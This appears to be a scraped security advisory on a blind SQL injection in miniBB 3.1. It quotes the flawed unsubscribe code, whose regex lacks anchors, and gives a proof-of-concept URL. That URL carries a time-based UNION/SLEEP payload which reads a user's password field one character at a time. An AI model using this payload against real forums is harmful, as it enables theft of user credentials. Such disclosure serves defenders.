preg_match() only check if $_GET["code"] contains at least one letter or digit (missing ^ and $ inside regexp). File: bb_func_unsub.php $usrid=(isset($_GET["usrid"])?$_GET["usrid"]+0:0); $allowUnsub=FALSE; $chkCode=FALSE; if(isset($_GET["code"]) and preg_match("#[a-zA-Z0-9]+#", $_GET["code"])){ //trying to unsubscribe directly from email $chkField="email_code"; $chkVal=$_GET["code"]; $userCondition=TRUE; $chkCode=TRUE; } else{ //manual unsubsribe $chkField="user_id"; $chkVal=$user_id; $userCondition=($usrid==$user_id); } if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, "id, user_id", "topic_id", "=", $topic, "", "", $chkField, "=", $chkVal))http://security.szurek.pl/minibb-31-blind-sql-injection.html
2. Proof of Concepthttp://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test" UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != " This SQL will check if first password character user ID=1 is “c”. If yes, it will sleep 5 seconds.
易网时代-编程资源站